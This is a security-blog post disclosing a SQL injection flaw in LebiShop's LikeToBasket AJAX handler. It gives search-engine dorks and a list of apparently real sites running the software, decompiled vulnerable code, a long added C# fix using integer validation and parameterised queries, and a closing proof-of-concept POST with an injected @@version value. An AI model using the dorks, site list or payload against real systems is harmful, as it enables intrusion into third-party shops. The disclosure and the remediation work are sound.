SQL injection in the LebiShop system

Date: 2015-2-8    Author: admin    Category: Technical Exchange


Search Google for the keyword intext:Powered by LebiShop

or search Google for the keyword

Powered by LebiShop inurl:Category.aspx



Some affected sites

Code:
http://168dev.com/lebishop/Category.aspx
http://oa.psy123.com.cn/AllCategories.aspx
http://www.huacaiye.com/Category.aspx?tid=1
http://daiba.com.cn/Category.aspx?id=9
http://hkapp.cn/EN/Category.aspx?id=10
http://54mbb.com/EN/NewsDetails.aspx?id=5
http://shop.lutoog.com/Brand.aspx?id=189
http://queengift.net/EN/Brand.aspx?id=190
http://www.snsrn.com/en/
http://www.skycastle100.com/Search.aspx?keyword=lianyiquan
http://71pg.com/Category.aspx?tid=35
http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2
http://lovedou.com/en/
http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1
http://newautoch.com/NewsDetails.aspx?id=5
http://memy.cc/
http://www.thanks789.com/Brand.aspx?id=191
http://m.gzyytz.cn/


Vulnerable URL

Code:
http://demo.lebi.cn/ajax/Ajax_userin.aspx


Code (decompiled LikeToBasket() handler; the comments mark the flaw):
public void LikeToBasket()
{
    string str = RequestTool.RequestString("id"); // only single quotes are escaped; everything else in the value passes through unchanged
    string str2 = "";
    if (str != "")
    {
        // "id" is concatenated straight into a numeric IN (...) list, so no quote is needed to alter the query: injection point
        foreach (Lebi_User_Product product in B_Lebi_User_Product.GetList(string.Concat(new object[] { "(Type_id_UserProductType=141 or Type_id_UserProductType=144) and User_id=", base.CurrentUser.id, " and id in (", str, ")" }), ""))
        {
            // look for an existing basket row (type 142) for the same user and product
            Lebi_User_Product model = B_Lebi_User_Product.GetModel(string.Concat(new object[] { "User_id=", base.CurrentUser.id, " and product_id=", product.Product_id, " and type_id_UserProductType=142" }));
            if (model != null)
            {
                model.count = product.count;
                B_Lebi_User_Product.Update(model);
            }
            else
            {
                product.Type_id_UserProductType = 0x8e; // 142: basket row
                product.count = product.count;          // no-op left by the decompiler
                B_Lebi_User_Product.Add(product);
            }
        }
        str2 = string.Concat(new object[] { base.Tag("商品已加入购物车"), "<div>", base.Tag("数量"), " <span>", base.Basket_Product_Count(), "</span> ", base.Tag("件"), " <span>", base.FormatMoney(base.Basket_Product_Price()), "</span></div><div><a href='", base.URL("P_Basket", ""), "' class='btn btn-7'><s></s>", base.Tag("查看购物车"), "</a>  <a href='javascript:void(0)' onclick='cloesedialog();' class='btn btn-11'><s></s>", base.Tag("关闭"), "</a></div>" });
    }
    // the JSON response echoes basket totals computed after the injected query ran
    base.Response.Write(string.Concat(new object[] { "{\"msg\":\"OK\",\"count\":\"", base.Basket_Product_Count(), "\",\"amount\":\"", base.FormatMoney(base.Basket_Product_Price()), "\",\"mes\":\"", str2, "\",\"url\":\"", base.URL("P_AddToBasket", ""), "\"}" }));
}
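The root cause above is that RequestString() escapes quotes while the value is used in a numeric IN (...) list, where no quote is ever needed. The following is an added example, not LebiShop's own code, showing the two fixes a reviewer would ask for: the "id" value is parsed as a strict list of integers (so a value such as @@version is rejected and can be logged), and the query is built with ADO.NET parameters instead of string concatenation. It assumes plain System.Data.SqlClient (built into .NET Framework, a NuGet package on .NET Core / .NET 5+), an already-open connection, and a table named Lebi_User_Product with the column names seen in the decompiled query; the B_Lebi_User_Product helpers are not used. The type ids 141, 144 and 142 are the constants from the original method.

```csharp
// Added example (not LebiShop code): hardened version of the lookup in LikeToBasket().
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;
using System.Linq;

public static class SafeLikeToBasket
{
    // Type_id_UserProductType values taken from the original method.
    private const int TypeLikedA = 141;
    private const int TypeLikedB = 144;
    private const int TypeBasket = 142; // 0x8e in the decompiled code

    // Strict parser for the "id" request value. Returns null unless the value is a
    // non-empty, comma-separated list of positive integers. No escaping is attempted:
    // for a numeric IN (...) list only restricting the value to digits closes the hole.
    public static int[] ParseIdList(string raw, int maxIds = 100)
    {
        if (string.IsNullOrWhiteSpace(raw)) return null;
        string[] parts = raw.Split(',');
        if (parts.Length > maxIds) return null;
        var ids = new int[parts.Length];
        for (int i = 0; i < parts.Length; i++)
        {
            // NumberStyles.None: digits only, no sign, no whitespace, no hex prefix.
            if (!int.TryParse(parts[i], NumberStyles.None, CultureInfo.InvariantCulture, out ids[i])
                || ids[i] <= 0)
                return null;
        }
        return ids.Distinct().ToArray();
    }

    // Parameterised equivalent of the concatenated GetList(...) query. Every id becomes
    // its own @idN parameter, so the statement text never contains user-controlled text.
    // Table name Lebi_User_Product is an assumption; column names are from the page.
    public static SqlCommand BuildLikedProductsQuery(SqlConnection conn, int userId, int[] ids)
    {
        if (ids == null || ids.Length == 0)
            throw new ArgumentException("ids must be a validated, non-empty list", nameof(ids));

        string[] names = ids.Select((_, i) => "@id" + i).ToArray();
        SqlCommand cmd = conn.CreateCommand();
        cmd.CommandText =
            "SELECT id, Product_id, count FROM Lebi_User_Product " +
            "WHERE (Type_id_UserProductType = @typeA OR Type_id_UserProductType = @typeB) " +
            "AND User_id = @userId AND id IN (" + string.Join(", ", names) + ")";
        cmd.Parameters.Add("@typeA", SqlDbType.Int).Value = TypeLikedA;
        cmd.Parameters.Add("@typeB", SqlDbType.Int).Value = TypeLikedB;
        cmd.Parameters.Add("@userId", SqlDbType.Int).Value = userId;
        for (int i = 0; i < ids.Length; i++)
            cmd.Parameters.Add(names[i], SqlDbType.Int).Value = ids[i];
        return cmd;
    }

    // Request handling as the page method should do it: validate first, then query.
    // conn is assumed to be open; currentUserId plays the role of base.CurrentUser.id.
    public static string HandleRequest(SqlConnection conn, int currentUserId, string rawIdParam)
    {
        int[] ids = ParseIdList(rawIdParam);
        if (ids == null)
        {
            // A value like "@@version" ends up here. Rejecting it is the fix; logging
            // the rejected value together with the user id is the detection signal.
            return "{\"msg\":\"invalid id list\"}";
        }
        using (SqlCommand cmd = BuildLikedProductsQuery(conn, currentUserId, ids))
        using (SqlDataReader reader = cmd.ExecuteReader())
        {
            var found = new List<int>();
            while (reader.Read()) found.Add(reader.GetInt32(0));
            // The basket update (type TypeBasket) would follow here, row by row, with
            // parameterised statements in the same style.
            return "{\"msg\":\"OK\",\"count\":\"" + found.Count + "\"}";
        }
    }
}
```

ParseIdList is the part worth copying: it refuses the input before any SQL is involved, and because it returns null rather than a sanitised string, the handler cannot accidentally fall back to concatenation. The parameterised IN list is the second layer; even if a future change lets a non-numeric value through, it reaches the database as a typed parameter, not as query text.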



First register an account and log in at http://demo.lebi.cn/Register.aspx

Username test333, password 111111

After registering and logging in, visit

Code:
http://demo.lebi.cn/ajax/Ajax_userin.aspx

and submit the following by POST:

Code:
__Action=LikeToBasket&id=@@version


(Screenshot: 552.png)

Tags: sql injection, LebiShop